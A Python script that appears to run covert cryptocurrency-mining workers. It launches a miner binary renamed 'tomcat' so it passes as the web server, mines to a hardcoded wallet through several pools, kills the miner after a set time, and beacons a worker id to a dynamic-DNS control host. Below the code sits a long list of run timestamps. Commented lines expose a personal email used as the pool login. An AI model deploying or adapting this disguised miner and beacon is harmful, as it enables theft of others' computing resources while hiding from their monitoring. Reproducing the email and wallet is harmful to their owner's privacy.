import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:05.804988
#2018-02-17 17:39:03.982508
#2018-02-17 19:26:07.126341
#2018-02-17 21:17:01.252177
#2018-02-17 23:00:07.756105
#2018-02-18 00:46:04.162480
#2018-02-18 02:35:07.979738
#2018-02-18 04:23:07.167320
#2018-02-18 06:14:01.762581
#2018-02-18 08:03:07.319121
#2018-02-18 09:51:01.530482
#2018-02-18 11:37:06.786824
#2018-02-18 13:22:04.667506
#2018-02-18 15:12:02.018960
#2018-02-18 17:01:05.100507
#2018-02-18 18:48:06.755975
#2018-02-18 20:36:07.416139
#2018-02-18 22:22:06.417424
#2018-02-19 00:11:05.239868
#2018-02-19 01:56:06.826874
#2018-02-19 03:43:05.382125
#2018-02-19 05:28:03.121628
#2018-02-19 07:15:08.313995
#2018-02-19 09:05:06.495222
#2018-02-19 10:53:05.898686
#2018-02-19 12:42:04.815864
#2018-02-19 14:29:01.716018
#2018-02-19 16:17:08.716024
#2018-02-19 18:03:08.571536
#2018-02-19 19:50:04.201721
#2018-02-19 21:38:04.079609
#2018-02-19 23:23:04.249216
#2018-02-20 01:09:06.655352
#2018-02-20 02:58:01.333177
#2018-02-20 04:46:05.553957
#2018-02-20 06:30:02.021518
#2018-02-20 08:15:03.697270
#2018-02-20 10:00:11.166333
#2018-02-20 11:44:09.446857
#2018-02-20 13:33:08.200126
#2018-02-20 15:18:02.931831
#2018-02-20 17:04:02.137563
#2018-02-20 18:51:08.392604
#2018-02-20 20:40:08.335464
#2018-02-20 22:26:04.589925
#2018-02-21 00:09:01.935387
#2018-02-21 01:54:04.966712
#2018-02-21 03:44:01.498708
#2018-02-21 05:33:05.271352
#2018-02-21 07:21:03.562931
#2018-02-21 09:05:06.486201
#2018-02-21 10:53:09.218718
#2018-02-21 12:39:06.953189
#2018-02-21 14:26:09.173058
#2018-02-21 16:12:02.051734
#2018-02-21 18:03:07.904193
#2018-02-21 19:51:07.418012
#2018-02-21 21:39:01.402006
#2018-02-21 23:25:09.593187
#2018-02-22 01:13:07.067045
#2018-02-22 03:02:06.827788
#2018-02-22 04:47:07.888007
#2018-02-22 06:32:01.329814
#2018-02-22 08:19:06.379751
#2018-02-22 10:07:06.573742
#2018-02-22 11:52:11.491151
#2018-02-22 13:38:05.409428
#2018-02-22 15:26:02.042959
#2018-02-22 17:12:10.606724
#2018-02-22 18:58:05.280975
#2018-02-22 20:50:01.254128
#2018-02-22 22:35:05.321469
#2018-02-23 00:21:06.526611
#2018-02-23 02:10:08.116007
#2018-02-23 04:02:01.986035
#2018-02-23 05:48:05.095756
#2018-02-23 07:38:02.220751
#2018-02-23 09:41:01.163465
#2018-02-23 11:45:02.907606
#2018-02-23 13:34:01.651707
#2018-02-23 15:21:04.722462
#2018-02-23 17:08:01.700603
#2018-02-23 18:38:04.599532
#2018-02-23 20:19:06.680509
#2018-02-23 21:57:06.878677
#2018-02-23 23:29:02.217498
#2018-02-24 01:04:07.521577
#2018-02-24 02:45:05.589778
#2018-02-24 04:23:04.164364
#2018-02-24 05:50:06.589184
#2018-02-24 07:27:01.600159
#2018-02-24 08:59:02.006247
#2018-02-24 10:48:03.725300
#2018-02-24 12:35:01.485690
#2018-02-24 14:23:06.220762
#2018-02-24 16:12:01.505486
#2018-02-24 18:04:04.964927
#2018-02-24 19:51:05.279012
#2018-02-24 21:35:06.911467
#2018-02-25 00:23:07.133936
#2018-02-25 03:29:04.795746
#2018-02-25 07:10:05.146371